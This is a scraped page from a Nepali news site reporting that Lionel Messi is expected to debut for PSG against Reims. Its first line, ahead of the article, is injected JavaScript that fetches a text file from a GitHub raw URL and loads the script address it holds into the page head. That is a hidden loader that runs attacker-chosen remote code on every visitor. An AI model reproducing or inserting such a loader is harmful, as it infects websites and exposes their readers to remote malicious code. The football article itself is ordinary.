;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); आज हुने खेलमा कस्तो होला मेस्सीको पहिलो पीएसजी डेब्यू – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • आज हुने खेलमा कस्तो होला मेस्सीको पहिलो पीएसजी डेब्यू
Breaking News

आज हुने खेलमा कस्तो होला मेस्सीको पहिलो पीएसजी डेब्यू

जुनेली न्यूज, काठमाण्डौ | स्टार स्ट्राइकर लियोनल मेसीले पेरिस सेन्ट जर्मन (पीएसजी)बाट आइतबार डेब्यू गर्ने भएका छन् ।

पीएसजीले रेइम्सविरुद्धको खेलका लागि सार्वजनिक गरेको २२ सदस्सीय टोलीमा मेस्सीको नाम पनि समावेश गरिएको छ । खेल नेपाली समयअनुसार मध्यराति साढे १२ बजे रेइम्सको मैदानमा शुरु हुनेछ । स्पेनिस अखबार मार्काले आइतबार फ्रान्सको घरेलु लिगमा रिम्ससँगको खेलमा मेस्सीले डेब्यू गर्ने भएपनि उनी सुरुवाती ११ मा रहने या वैकल्पिक खेलाडीका रुपमा मैदान प्रवेश गर्ने भन्ने निश्चित भइनसकेको उल्लेख गरेको छ ।When will Messi debut with PSG? - Himal Sanchar

प्रशिक्षक माउरिसिओ पोचेटिन्होको टोलीमा रहेर १५ दिन प्रशिक्षण गरेपछि मेस्सी डेब्युका लागि तयार भएका हुन्।

फेसबुक प्रतिक्रियाहरु